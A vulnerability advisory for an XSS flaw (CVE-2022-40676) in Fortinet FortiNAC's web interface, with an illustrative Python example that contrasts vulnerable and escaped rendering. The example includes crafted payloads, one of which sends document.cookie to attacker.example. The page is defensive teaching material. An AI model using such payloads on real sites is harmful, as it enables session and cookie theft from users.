PT-2022-6448 · Fortinet · Fortinac

Published

2022-09-14

·

Updated

2023-03-14

·

CVE-2022-40676

CVSS v2.0

7.6

High

Vector

AV:N/AC:H/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions

Fortinet FortiNAC versions 8.3.7, 8.5.0 through 8.5.4, 8.6.0 through 8.6.5, 8.7.0 through 8.7.6, 8.8.0 through 8.8.11, 9.1.0 through 9.1.8, 9.2.0 through 9.2.5, 9.4.0
Description

The issue is an improper neutralization of input during web page generation (CWE-79) in the FortiNAC web interface: values taken from specially crafted HTTP requests are written into generated pages without adequate encoding, which makes cross-site scripting possible. A remote attacker can thereby cause attacker-supplied script to run in the browser of a user of the FortiNAC web interface, within that user's session and with that user's privileges in the application.
Recommendations

For the affected Fortinet FortiNAC versions listed above, update to a release that contains the vendor's fix for this issue. Until the update is applied, restrict access to the FortiNAC web interface to trusted administrative networks (for example with firewall rules or a dedicated management network) so that untrusted parties cannot reach the interface or deliver crafted requests to the administrators who use it. Note that the crafted HTTP request is supplied by the attacker, not by the administrator, so the risk is not reduced by simply refraining from issuing such requests oneself.
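The vulnerable pattern named in the description, interpolating request input into a generated page without encoding, and its corresponding fix, shown as an added Python example written for this page. It is not FortiNAC code and says nothing about where the real flaw sits; the URL path, the `q` parameter, the payloads and the request lines are all constructed for illustration. It goes slightly beyond the description by covering two output contexts, an HTML text node and a quoted attribute value, because each must be encoded for the context it lands in.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines (not taken from the advisory). The path and
# the "q" parameter are assumptions for illustration. The first carries a
# script payload aimed at an HTML text node, the second an attribute-breakout
# payload aimed at a quoted attribute value.
CRAFTED_TEXT_CONTEXT = (
    "GET /portal/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2F"
    "attacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1"
)
CRAFTED_ATTR_CONTEXT = (
    "GET /portal/search?q=%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22 HTTP/1.1"
)


def query_param(request_line, name):
    """Return the percent-decoded value of one query parameter from an HTTP request line."""
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(q):
    """CWE-79 pattern: the parameter is written raw into the generated page,
    once inside a double-quoted attribute value and once as text content."""
    return f'<input name="q" value="{q}"><p>Results for: {q}</p>'


def render_hardened(q):
    """Same page with output encoding applied. html.escape with quote=True
    encodes <, >, &, " and ', so the value can neither open a new tag in the
    text node nor terminate the double-quoted attribute it sits in."""
    safe = html.escape(q, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for: {safe}</p>'


def has_injected_markup(page):
    """Heuristic used only for this demonstration: did a payload reach the page
    as live markup (a new script tag, or a new event-handler attribute with a
    real quote delimiter) rather than as inert text?"""
    lowered = page.lower()
    return "<script" in lowered or ' onfocus="' in lowered


def demo():
    """For each constructed request, report (vulnerable_injected, hardened_injected)."""
    results = {}
    for label, request_line in (("text", CRAFTED_TEXT_CONTEXT),
                                ("attr", CRAFTED_ATTR_CONTEXT)):
        q = query_param(request_line, "q")
        results[label] = (has_injected_markup(render_vulnerable(q)),
                          has_injected_markup(render_hardened(q)))
    return results


if __name__ == "__main__":
    for label, (vulnerable, hardened) in demo().items():
        print(f"{label} context: vulnerable={vulnerable} hardened={hardened}")
```

The check is deliberately crude; it exists only to make the difference between the two renderers visible. In a real fix the encoding must match every context the value is written into (HTML text, attribute, URL, JavaScript string), and a templating engine with context-aware auto-escaping is the usual way to get that right consistently.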

Weakness Enumeration

XSS (CWE-79: Improper Neutralization of Input During Web Page Generation)

Related Identifiers

BDU:2023-01332
CVE-2022-40676

Affected Products

Fortinac